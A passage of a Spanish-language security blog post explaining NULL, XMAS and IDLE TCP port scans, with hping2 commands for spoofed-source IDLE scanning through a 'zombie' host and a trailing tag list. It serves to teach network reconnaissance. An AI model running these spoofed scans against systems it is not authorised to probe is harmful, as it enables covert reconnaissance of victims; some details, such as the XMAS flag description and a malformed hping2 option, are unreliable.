Éste es dependiente del sistema operativo de la versión de éste, ya que en versiones recientes este bug ha sido parchado y no puede emplearse como método de detección de puertos abiertos o cerrados.

NULL Scanning

En éste método dejamos inactivos todos los flags del paquete (ACK, FIN, RST, URG, SYN, PSH).

Cuando un paquete de ésta clase llega a un servidor, si el puerto se encuentra cerrado se enerará un RST por parte del servidor. Sin embargo, si el puerto se encuentra abierto, éste desechará el paquete y no responderá de ninguna manera. Esta forma de escaneo queda esquematizado en la figura 5.

Los estándares RFC no marcan ninguna clase de respuesta especifica con respecto de este tipo de paquetes por lo que el escaneo es dependiente del sistema operativo que está siendo escudriñado, como siempre confrontando Window Vs. UNIX.
Figura N°5 NULL Scanning

XMAS Scanning

Ésta técnica es todo lo contrario a la anterior y no tiene nada que ver con la navidad. En éste método activamos todos los flags presentes en la cabecera TCP (ACK, FIN, RST, URG, SYN, PSH). Al igual que en los casos anteriores, ésta técnica es dependiente de que la pila TCP/IP del equipo remoto esté basada en el código BSD, por lo que se limita a sistemas UNIX.

En éste proceso, cuando el servidor recibe un paquete con estas características, si el puerto se encuentra abierto, el kernel desechará el paquete, mientras que responderá con un RST si el puerto se encuentra cerrado. Todo lo demás es igual al NULL scanning con respecto de la respuesta del servidor.

IDLE Scanning

Éste procedimiento fue publicado en Bugtraq hace ya algunos años. Es la técnica más interesante y de gran utilidad. Hay que tener dos cosas en mente: siempre se debe efectuar de manera adecuada y tenemos que conocer la forma de interpretar los resultados que se obtienen. El método nos permite escanear una máquina remota utilizando paquetes “spoofeados” (es decir, con una dirección IP diferente de la nuestra) y una máquina zombie, que una computadora que se emplea como intermediaria para realizar ataques a una computadora víctima sin que ella tenga conciencia del procedimiento.

La idea es que nuestra computadora no pueda ser detectada desde la máquina atacada. En el IDLE scanning se usa una zombie para cuestiones de escaneo en nuestra red local propia. Para llevar a cabo este escaneo se aprovechara uno de los puntos débiles que se han descubierto al TCP/IP: números de secuencia IPID predecibles.

Los aspectos de TCP/IP básicos a tener en cuenta para llevar a cabo éste escaneo son los siguientes:

1. Una máquina responde con un SYN/ACK a un SYN si el puerto se encuentra abierto.
2. Una máquina responde con un RST a un SYN si el puerto se encuentra cerrado.
3. Una máquina responde con un RST a un SYN/ACK.
4. Una máquina no responde con nada a un RST.
5. Podemos conocer el número de paquetes que la máquina remota está enviando mediante el
campo IDIP de la cabecera IP.

Para explicar éste procedimiento, chequemos la figura 6.
Figura N°6 IDLE Scanning : Paso 1
 En el paso uno debemos encontrar una máquina que no tenga mucho tráfico y en la que podamos controlar las variaciones de la secuencia IPID. Para ello podemos utilizar la herramienta Hping2 y comprobar la variación de este valor.
hping2 -i u1000 -p 80 -r -S -A zombie

HPING zombie (eth0 zombie): S set, 40 headers + 0 data bytes
60 bytes from zombie: flags=RA seq=0 ttl=64 id=41660 win=0 time=1.2ms
60 bytes from zombie: flags=RA seq=1 ttl=64 id=+1 win=0 time=75ms
60 bytes from zombie: flags=RA seq=2 ttl=64 id=+1 win=0 time=91ms
60 bytes from zombie: flags=RA seq=3 ttl=64 id=+1 win=0 time=90ms
60 bytes from zombie: flags=RA seq=4 ttl=64 id=+1 win=0 time=91ms
60 bytes from zombie: flags=RA seq=5 ttl=64 id=+1 win=0 time=87ms

Con la opción -r obtenemos el valor relativo del campo id, es decir, la diferencia entre el id anterior y el nuevo id. Mediante esta variación podemos conocer si la máquina está enviando mucho o poco tráfico. Éste será el valor que nosotros utilizaremos para realizar el escaneo.

En el siguiente paso, una vez conocido el id de la respuesta al SYN que hemos enviado, será enviar un SYN a la máquina destino, pero con la IP spoofeada a la máquina zombie. Tecleamos:
hping2 -i -u1000 -p 22 -S -a zombie www.xxx.yyy.zzz
Figura N°6 IDLE Scanning : Paso 2
Enviamos a la máquina destino paquetes SYN diciendo que somos la máquina zombie. Si el puerto estuviese abierto en la máquina destino, ésta respondería al zombie con un SYN/ACK. El zombie, al recibir un SYN/ACK que no se corresponde con un SYN previo, envía un RST. De ésta forma, al enviar paquetes el zombie, el número de secuencia aumenta. Si el puerto estuviese cerrado, la máquina destino enviaría un RST al zombie. Al tratarse de un RST, la máquina no responde de ninguna forma y desecha el paquete.

En el paso 3, y último, se comprueba si el id de la máquina zombie se ha modificado o no. Como cualquier máquina genera suficiente tráfico como para que éste valor varíe frecuentemente, en vez mde tener en cuenta si el valor id ha variado en una o dos unidades, como se representa en la figura 6 paso 1 y 2, lo que haremos es lanzar dos procesos: uno que envía SYN/ACK a la máquina zombie (para controlar la variación del campo id) y otro que enviará los SYN spoofeados a la máquina destino. De esta forma podremos comprobar en tiempo real si al lanzar el segundo proceso (paquetes spoofeados, el valor del id devuelto por la máquina zombie varía o permanece dentro de unos límites).
Figura N°6 IDLE Scanning : Paso 3
 
Una buena opción para asegurarnos de que esta variación es consecuencia de nuestro envío de paquetes, es enviar una gran cantidad de paquetes, de esta manera, si vemos el valor del id presentará saltos en la misma proporción que el número de paquetes enviado por segundo. Para hacer pruebas es sugerible que se lancen los siguientes procesos en dos terminales diferentes. Debemos adecuar los puertos según la intención del escaneo:

Terminal 1
hping2 -i -u10 -p 80 -r -S -A zombie

www.xxx.yyy.zzz

Terminal 2
hping2 -i -u10 -p 22 -S -A zombie

Con el parámetro -i controlamos el tiempo de espera entre el envío de cada paquete. En este caso, enviamos un paquete cada 10 microsegundos. Como el tráfico generado va a ser muy abundante, si el puerto 22 de la máquina www.xxx.yyy.zzz se encuentra abierto, enviará el mismo número de paquetes SYN/ACK a la máquina zombie, que responderá con el mismo número de paquetes RST, produciéndose un incremento en el valor del campo id que será fácilmente apreciable.

Aqui hay diferentes tool's que usted necesita para hacer dichos escaneos http://blackploit.blogspot.com/2010/03/scanners-win32.html

Referencias :

Aprovechando Puertas Abiertas; Por Marcelo Damonte
Escalandp Privilegios; Por Ismael Briones Vilar.
Tutorial: Hping2 Basics; Por Chris Gates.


Fuente: http://foro.portalhacker.net/

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.